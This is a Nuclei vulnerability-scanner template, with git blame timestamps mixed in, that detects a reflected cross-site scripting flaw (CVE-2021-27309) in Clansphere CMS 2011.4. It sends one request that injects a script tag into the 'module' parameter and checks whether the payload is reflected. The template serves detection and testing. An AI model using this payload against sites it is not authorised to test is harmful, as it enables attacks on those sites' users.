nuclei-templates/cves/2021/CVE-2021-27309.yaml

45 lines
1.2 KiB
YAML
Raw Normal View History

2022-06-17 06:01:40 +00:00
id: CVE-2021-27309
info:
name: Clansphere CMS 2011.4 - Cross-Site Scripting
2022-06-17 06:01:40 +00:00
author: edoardottt
severity: medium
2022-06-21 03:45:58 +00:00
description: |
Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the "module" parameter.
2022-06-21 03:45:58 +00:00
reference:
- https://github.com/xoffense/POC/blob/main/Clansphere%202011.4%20%22module%22%20xss.md
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27309
- https://nvd.nist.gov/vuln/detail/CVE-2021-27309
2022-06-17 06:01:40 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-27309
cwe-id: CWE-79
2022-06-21 03:46:45 +00:00
metadata:
verified: true
2022-06-21 03:45:58 +00:00
tags: cve,cve2021,clansphere,xss,cms,unauth
2022-06-17 06:01:40 +00:00
requests:
- method: GET
path:
2022-06-21 03:45:58 +00:00
- "{{BaseURL}}/mods/clansphere/lang_modvalidate.php?language=language&module=module%22></script><script>alert(document.domain)</script>"
2022-06-17 06:01:40 +00:00
matchers-condition: and
matchers:
- type: word
2022-06-21 03:45:58 +00:00
part: body
2022-06-17 06:01:40 +00:00
words:
2022-06-21 03:45:58 +00:00
- '"></script><script>alert(document.domain)</script>.php'
2022-06-17 06:01:40 +00:00
- type: word
2022-06-21 03:45:58 +00:00
part: header
2022-06-17 06:01:40 +00:00
words:
2022-06-21 03:45:58 +00:00
- "text/html"
- type: status
status:
- 200
# Enhanced by mp on 2022/08/28